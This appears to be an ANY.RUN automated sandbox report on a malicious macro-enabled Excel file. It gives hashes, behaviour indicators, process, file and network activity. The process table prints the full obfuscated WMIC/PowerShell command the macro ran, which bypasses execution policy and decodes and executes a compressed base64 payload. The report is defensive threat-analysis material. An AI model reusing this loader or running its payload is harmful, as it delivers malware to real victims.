analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample1.xlsm

Full analysis: https://app.any.run/tasks/113c5646-27a0-4a78-8344-12d33e819077
Verdict: Malicious activity
Analysis date: February 22, 2020, 04:50:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

7DF73556B47C4A9FB4F6BBFA976892C7

SHA1:

56047B40F3D13E2DEAD3DA8B7EE223F1341B7455

SHA256:

3107BB5CF11594FD008A9177ED7BC2D58D0000B11B60D1F6DE6B9FE6B0684185

SSDEEP:

768:Ikeee/6tgxE6JJZ2GnHqY86CVmiJ1BoPH3f:Ikee1g+6ASHqY86c33SPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3000)

  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • wmiC.exe (PID: 2672)

    • Uses WMIC.EXE to create a new process

      • EXCEL.EXE (PID: 3000)

    • Starts Internet Explorer

      • EXCEL.EXE (PID: 3000)

    • Reads Internet Cache Settings

      • EXCEL.EXE (PID: 3000)

  • INFO

    • Reads the machine GUID from the registry

      • EXCEL.EXE (PID: 3000)
      • iexplore.exe (PID: 3060)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 3000)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3000)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3060)

    • Reads settings of System Certificates

      • EXCEL.EXE (PID: 3000)
      • iexplore.exe (PID: 3060)

    • Changes internet zones settings

      • iexplore.exe (PID: 3060)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlam | Excel Macro-enabled Open XML add-in (42.4)
.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (29.2)
.xlsx | Excel Microsoft Office Open XML Format document (17.3)
.zip | Open Packaging Conventions container (8.9)
.zip | ZIP compressed archive (2)

EXIF

XML

AppVersion: 16.03
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
Company: -
TitlesOfParts:
  • Sheet1
  • Sheet1!Print_Area
HeadingPairs:
  • ワークシート
  • 1
  • 名前付き一覧
  • 1
ScaleCrop: No
DocSecurity: None
ModifyDate: 2020:02:21 01:47:44Z
CreateDate: 2015:06:05 18:19:34Z
LastPrinted: 2020:02:21 01:26:52Z

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1354
ZipCompressedSize: 406
ZipCRC: 0x65c41be9
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs iexplore.exe iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.4756.1000
2672wmiC Process "caLL" "crEaTE" "PowerShELL -nOpRofiLE -NonI -W 1 -EXECUTiONPOL byPaSS "\". ( `$verbosePREFerenCe.toStRIng()[1"\"+ ([CHar]44).ToStriNG() +"\"3]+'x'-join'')( NeW-ObjECt sYstEM.iO.cOMPRessIOn.dEFLaTEStreAm([SyStEm.Io.MemoryStreaM] [conVeRt]::frOMBAse64STrINg('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' )"\"+ ([CHar]44).ToStriNG() +"\"[syStEm.iO.cOmPResSiOn.ComPResSiONMODe]::DeCOMPreSS )|fOREACh {NeW-ObjECt sYStem.IO.STREAmreaDeR( `$_"\"+ ([CHar]44).ToStriNG() +"\"[SYSTem.tEXt.ENCODiNg]::ASCIi )}).reADToeNd( )"\" | & ( $PshOMe[21]+$PShOme[30]+'X')" 0 C:\Windows\System32\Wbem\wmiC.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
47054
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3060"C:\Program Files\Internet Explorer\iexplore.exe" https://www.mhlw.go.jp/stf/seisakunitsuite/bunya/kenkou_iryou/dengue_fever_qa_00001.html#Q1C:\Program Files\Internet Explorer\iexplore.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2412"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3060 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
1 124
Read events
993
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
32
Unknown types
2

Dropped files

PID
Process
Filename
Type
3000EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD3F2.tmp.cvr
MD5:
SHA256:
3000EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\dengue_fever_qa_00001[1].htm
MD5:
SHA256:
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\000269503[1].pngimage
MD5:1C899B13CD67822A63A9AD41AC0452DE
SHA256:700AA880136B761078FBD81D3190C5C291711E13278403DCFDC4757CE531829B
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\transparent-header[1].pngimage
MD5:A18E566849A133668E68DFF1D7297125
SHA256:34E967F41057017C98F8AE16967407672FBB23D45A50E99CCD454714C1072D9C
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\transparent-footer[1].pngimage
MD5:BC74B164177625A9BA8718F0E1FDA6A0
SHA256:533022E5FE4129EDDC93E4E7CAE452B4486246285BF338842EAC93EC8C6473E3
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\000593684[1].jpgimage
MD5:191DC3DBCDF50C4926EC5B9DE912A691
SHA256:7C66298BE97C49C485C161191C06F541B13D7ACC26FE564B06CCCBEE48125F29
3000EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:2169B37655942C4C8C8E40520C808107
SHA256:87A979DE5FAA8BC14C2BCDDEB209203FE63047CBA239643045BE440DCEDE9AB3
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\icn_lang[1].svgimage
MD5:078C2E3A5AB01102DD99F0156B47A86C
SHA256:2ED5E7640A8084B6489ED36569B39A5BFAE4311DD7FBC077D5208917B048E5F2
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\QR_mobile[1].pngimage
MD5:773C657541BFB26440A76F11BC67DE1A
SHA256:223E78EAD383554E6106F5499A902FEDEBC219FDA178B426CD0E95F91D222C2E
2412IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\app[1].csstext
MD5:18939EE875FAAF197B4EE685801440D6
SHA256:12CAC2BB13318EB3E772C0E53A9315BCCA2EBBEFE0B0A9E2CCBD541E4CA9EE82
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
21
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3000
EXCEL.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/common/css/app.css
NL
text
290 Kb
whitelisted
3000
EXCEL.EXE
GET
200
169.56.3.74:443
https://ewb-c.infocreate.co.jp/ewbc/ptspk_loader.js?siteId=031_mhlw
US
html
20.4 Kb
unknown
3000
EXCEL.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/content/000269503.png
NL
image
12.2 Kb
whitelisted
3000
EXCEL.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/common/img/transparent-header.png
NL
image
1.08 Kb
whitelisted
2412
IEXPLORE.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/common/img/icn_lang.svg
NL
image
372 b
whitelisted
2412
IEXPLORE.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/common/img/icn_toggle_plus.svg
NL
image
613 b
whitelisted
2412
IEXPLORE.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/content/000593686.jpg
NL
image
12.6 Kb
whitelisted
2412
IEXPLORE.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/content/000599117.png
NL
image
27.1 Kb
whitelisted
2412
IEXPLORE.EXE
GET
200
184.30.211.14:443
https://www.mhlw.go.jp/content/000593572.png
NL
image
118 Kb
whitelisted
2412
IEXPLORE.EXE
GET
200
209.197.3.24:443
https://code.jquery.com/jquery-3.2.1.min.js
US
text
84.6 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2412
IEXPLORE.EXE
172.217.22.4:443
www.google.com
Google Inc.
US
whitelisted
2412
IEXPLORE.EXE
184.30.211.14:443
www.mhlw.go.jp
Akamai International B.V.
NL
whitelisted
3000
EXCEL.EXE
184.30.211.14:443
www.mhlw.go.jp
Akamai International B.V.
NL
whitelisted
2412
IEXPLORE.EXE
172.217.22.78:443
cse.google.com
Google Inc.
US
whitelisted
2412
IEXPLORE.EXE
169.56.3.74:443
ewb-c.infocreate.co.jp
SoftLayer Technologies Inc.
US
unknown
2412
IEXPLORE.EXE
209.197.3.24:443
code.jquery.com
Highwinds Network Group, Inc.
US
malicious
3060
iexplore.exe
184.30.211.14:443
www.mhlw.go.jp
Akamai International B.V.
NL
whitelisted
3060
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
www.mhlw.go.jp
  • 184.30.211.14
unknown
ewb-c.infocreate.co.jp
  • 169.56.3.74
unknown
www.google.com
  • 172.217.22.4
whitelisted
code.jquery.com
  • 209.197.3.24
whitelisted
cse.google.com
  • 172.217.22.78
whitelisted
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
sample1.xlsm